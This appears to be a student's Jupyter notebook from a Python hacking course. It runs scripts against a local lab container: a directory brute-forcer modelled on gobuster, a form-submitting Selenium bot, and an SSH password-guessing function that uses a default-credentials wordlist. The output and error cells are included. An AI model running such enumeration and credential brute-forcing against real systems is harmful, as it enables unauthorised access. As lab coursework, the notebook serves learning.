In [1]:
import queue
import threading
import os
import requests
from urllib.request import urlopen, Request
from urllib.error import HTTPError
from bs4 import BeautifulSoup
import wget
from urllib import request
import urllib.request, urllib.error, urllib.parse
import re
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import time
from selenium.webdriver.common.by import By


In [2]:
class MySpider():
    def __init__(self):
        pass
        
    def mygobuster(self,target):
        wordlist = [a.strip() for a in open("wordlist.txt")]
        filters = [".html",".css","jpg", "",".js",".md",".png"]
        html = open("html.txt", "a+") 
        for word in wordlist:
            for f in filters:
                url = target+word+f
                re = requests.head(url)

                if re.status_code==301 or re.status_code==401:
                    print("Directory found: ", re.url, re.status_code)
                    newurl = re.url+"/"
                    
                    self.mygobuster(newurl)

                elif re.status_code==200:
                    print("Found: ", re.url, re.status_code)
                    response = urllib.request.urlopen(url)
                    if ".html" in re.url:
                        html.write(re.url+"\n")
                    try:
                        Content = response.read().decode('utf-8')
                        f = open("found/"+str(re.url).replace("/",""), 'w+')
                        f.write(Content)
                        f.close()
                    except:
                        Content = response.read()
                        f = open("found/"+str(re.url).replace("/",""), 'wb+')
                        f.write(Content)
                        f.close()
                else:
                    continue

    def CSSbuster(self, target):
        r  = requests.get(" http://172.17.0.2:1337/stylesheet.css")
        data = r.text
        l = []
        for i in re.findall('url\(([^)]+)\)',data):
            l.append(i)
        s = [x[2:].strip('""') for x in l[:2]]
        for j in s:
            response = urllib.request.urlopen(target+j)
            if response.code==200:
                print("Picture found:", target+j)
                con = response.read()
                f = open("found/"+str(response.url).replace("/",""), 'wb+')
                f.write(con)
            else:
                pass
    
    
    def myBot(self):
        
        s=Service('/home/sleven/Studium/Sem5/Hacking-mit-Python/geckodriver')
        browser = webdriver.Firefox(service=s)
        for url in open("html.txt"):
            if url=="http://172.17.0.2:1337/biete.html\n":
                browser.get(url)
                eingabe = browser.find_element(By.ID,"ort")
                eingabe.send_keys("Salzburg")
                time.sleep(1)
                eingabe2 = browser.find_element(By.ID,"preis")
                eingabe2.send_keys("1500")
                time.sleep(1)
                eingabe2 = browser.find_element(By.ID,"zimmer")
                eingabe2.send_keys("5")
                time.sleep(1)
                eingabe3 = browser.find_element(By.ID,"flaeche")
                eingabe3.send_keys("500")
                time.sleep(1)
                eingabe4 = browser.find_element(By.ID,"kontakt")
                eingabe4.send_keys("Mori.r@web.de")
                time.sleep(1)

                ein = browser.find_element(By.ID,"saveimmoButton")
                ein.click()
                time.sleep(1)
            browser.get(url)
            time.sleep(1)


In [3]:
S = MySpider()
S.mygobuster("http://172.17.0.2:1337/")
S.CSSbuster("http://172.17.0.2:1337/")

Directory found:  http://172.17.0.2:1337/data 301
Directory found:  http://172.17.0.2:1337/data/about 301
Found:  http://172.17.0.2:1337/data/about/index.html 200
Directory found:  http://172.17.0.2:1337/data/faq 301
Found:  http://172.17.0.2:1337/data/faq/index.html 200
Directory found:  http://172.17.0.2:1337/data/impressum 301
Found:  http://172.17.0.2:1337/data/impressum/index.html 200
Directory found:  http://172.17.0.2:1337/data/datenschutz 301
Found:  http://172.17.0.2:1337/data/datenschutz/index.html 200
Directory found:  http://172.17.0.2:1337/data/about 301
Found:  http://172.17.0.2:1337/data/about/index.html 200
Directory found:  http://172.17.0.2:1337/data/impressum 301
Found:  http://172.17.0.2:1337/data/impressum/index.html 200
Directory found:  http://172.17.0.2:1337/img 301
Directory found:  http://172.17.0.2:1337/img/background-images 301
Found:  http://172.17.0.2:1337/about.html 200
Found:  http://172.17.0.2:1337/index.html 200
Found:  http://172.17.0.2:1337/biete.htm

**Selenium**

In [37]:
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import time
from selenium.webdriver.common.by import By

In [12]:
s=Service('/home/sleven/Studium/Sem5/Hacking-mit-Python/geckodriver')
browser = webdriver.Firefox(service=s)
url = 'http://172.17.0.2:1337/biete.html'
#driver = webdriver.Firefox(executable_path="/home/sleven/Studium/Sem5/Hacking-mit-Python/geckodriver")
browser.get(url)
time.sleep(2)

In [23]:
def myBot():
    s=Service('/home/sleven/Studium/Sem5/Hacking-mit-Python/geckodriver')
    browser = webdriver.Firefox(service=s)
    for url in open("html.txt"):
        if url=="http://172.17.0.2:1337/biete.html\n":
            browser.get(url)
            eingabe = browser.find_element(By.ID,"ort")
            eingabe.send_keys("Salzburg")
            time.sleep(1)
            eingabe2 = browser.find_element(By.ID,"preis")
            eingabe2.send_keys("1500")
            time.sleep(1)
            eingabe2 = browser.find_element(By.ID,"zimmer")
            eingabe2.send_keys("5")
            time.sleep(1)
            eingabe3 = browser.find_element(By.ID,"flaeche")
            eingabe3.send_keys("500")
            time.sleep(1)
            eingabe4 = browser.find_element(By.ID,"kontakt")
            eingabe4.send_keys("Mori.r@web.de")
            time.sleep(1)

            ein = browser.find_element(By.ID,"saveimmoButton")
            ein.click()
            time.sleep(1)
        browser.get(url)
        time.sleep(1)
        

In [24]:
myBot()

In [70]:
import urllib3

**SSH Angriff**

In [5]:
import sys
import paramiko
from collections import deque

In [1]:
import sys
import paramiko
from collections import deque
import sys
import paramiko

def attackssh(ip):
    try:
        global que
        print("Attacking ssh.....")
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        for line in range(len(que)):
            print("Im here")
            [username, password] = que[line].strip().split()
            try:
                print(f"Trying with {username} {password}")
                que.popleft()
                conn = ssh.connect(ip, username=username,password=password)
                if conn is None:
                    print("Successfully Authenticated")
                    print(que)
                    break
            
            except paramiko.AuthenticationException:
                print("Failed!")
                print(que)
                continue
    except NameError:
        print("I was here")
        que = deque()
        for i in open("sshwordlist.txt", "r").readlines():
            que.append(i)
        attackssh("172.17.0.2")        
        

In [2]:

attackssh("172.17.0.2")

Attacking ssh.....
I was here
Attacking ssh.....
Im here
Trying with admin password
Failed!
deque(['root toor\n', 'admin admin\n', 'root root\n'])
Im here
Trying with admin admin
Failed!
deque(['admin admin\n', 'root root\n'])
Im here


IndexError: deque index out of range

In [7]:
que

IndexError: pop from an empty deque

In [5]:
cat sshwordlist.txt

admin password
root toor
admin admin
root root


In [36]:
q

deque([])

In [28]:
if not d:
    print("hi")
else:
    print("du")

NameError: name 'd' is not defined

In [19]:
def rec():
    try:
        global l
        print(l)
        return
    except NameError:
        l = 1
        rec()

In [21]:
rec()

1


In [1]:
l = 1

In [2]:
print(l)

1


In [31]:
s = deque()
for i in open("sshwordlist.txt").readlines():
    s.append(i)
    #[username, password] = s[i].strip().split()
    


In [32]:
for i in range(len(s)):
    print(s)
    print(s[i])
    s.pop(0)
    

deque(['admin password\n', 'root toor\n', 'admin admin\n', 'root root\n'])
admin password



TypeError: pop() takes no arguments (1 given)

In [19]:
s

deque(['admin password\n', 'root toor\n', 'admin admin\n', 'root root\n'])